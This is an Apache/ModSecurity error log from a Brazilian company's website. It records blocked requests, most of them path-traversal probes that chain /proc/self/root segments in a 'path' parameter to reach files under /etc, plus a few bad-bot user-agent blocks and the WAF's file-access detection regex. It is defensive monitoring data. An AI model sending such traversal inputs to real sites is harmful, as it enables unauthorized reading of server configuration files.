[Tue Mar 17 08:43:09.302924 2026] [:error] [pid 11469:tid 140411716749056] [client 74.7.244.31:56446] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk-TZDEJR9VXonE_-1HtAAAAQM"]
[Tue Mar 17 08:43:25.524808 2026] [:error] [pid 11469:tid 140411683178240] [client 74.7.243.203:42508] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk-XZDEJR9VXonE_-1HyQAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:43:37.007145 2026] [:error] [pid 2305:tid 140411741927168] [client 74.7.241.46:60130] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk-aQQohV2v-7oj5HH07QAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:43:39.564834 2026] [:error] [pid 1961:tid 140411624429312] [client 74.7.241.46:52360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk-a3RXaaWotPICgYse0QAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:43:39.957993 2026] [mime_magic:error] [pid 7437:tid 140411691570944] (70014)End of file found: [client 74.7.243.203:53376] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc
[Tue Mar 17 08:44:05.560920 2026] [:error] [pid 2305:tid 140411616036608] [client 74.7.243.203:56754] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk-hQQohV2v-7oj5HH1HgAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:44:55.110793 2026] [:error] [pid 2305:tid 140411725141760] [client 74.7.241.46:52362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk-twQohV2v-7oj5HH1VgAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:45:00.585077 2026] [:error] [pid 2305:tid 140411590858496] [client 74.7.241.46:41888] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk-vAQohV2v-7oj5HH1XwAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:45:02.324992 2026] [:error] [pid 7000:tid 140411590858496] [client 74.7.241.46:46478] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk-vhePVOt35XCGZP8p1QAAA5I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:45:05.542086 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.241.46:46486] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk-wdCmCSWTlPouqorFugAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:45:27.523749 2026] [:error] [pid 1961:tid 140411582465792] [client 74.7.241.46:46500] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk-13RXaaWotPICgYse_AAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:45:55.903386 2026] [:error] [pid 11469:tid 140411607643904] [client 74.7.241.46:54940] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk-85DEJR9VXonE_-1IEQAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:46:08.403213 2026] [:error] [pid 2305:tid 140411540502272] [client 74.7.243.203:46160] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_AAQohV2v-7oj5HH1cwAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:46:25.090378 2026] [:error] [pid 7000:tid 140411616036608] [client 74.7.241.46:52454] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_DxePVOt35XCGZP8p-wAAA48"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:46:33.415372 2026] [:error] [pid 1961:tid 140411691570944] [client 74.7.243.203:46168] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_GXRXaaWotPICgYsfFgAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:46:43.215273 2026] [:error] [pid 7000:tid 140411590858496] [client 74.7.241.46:59444] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_IRePVOt35XCGZP8qCQAAA5I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:47:02.181117 2026] [:error] [pid 1016:tid 140411649607424] [client 74.7.241.46:59800] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_NpqmL8PQht4WJFlB5QAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:47:03.528440 2026] [:error] [pid 11469:tid 140411699963648] [client 74.7.241.46:57664] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_N5DEJR9VXonE_-1IMQAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:47:10.563272 2026] [:error] [pid 1961:tid 140411557287680] [client 74.7.241.46:57666] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_PnRXaaWotPICgYsfJQAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:47:46.980330 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.241.46:45754] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_YqBJNF7axNlVR0X3FwAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:47:48.725566 2026] [:error] [pid 11469:tid 140411574073088] [client 74.7.241.46:52068] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_ZJDEJR9VXonE_-1INwAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:48:10.390565 2026] [:error] [pid 1016:tid 140411607643904] [client 74.7.244.31:58256] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk_epqmL8PQht4WJFlB7wAAAVA"]
[Tue Mar 17 08:48:13.463416 2026] [:error] [pid 2473:tid 140411590858496] [client 74.7.243.203:52960] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_faBJNF7axNlVR0X3RwAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:48:22.390199 2026] [:error] [pid 1961:tid 140411624429312] [client 74.7.228.16:49392] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk_hnRXaaWotPICgYsfMAAAA04"]
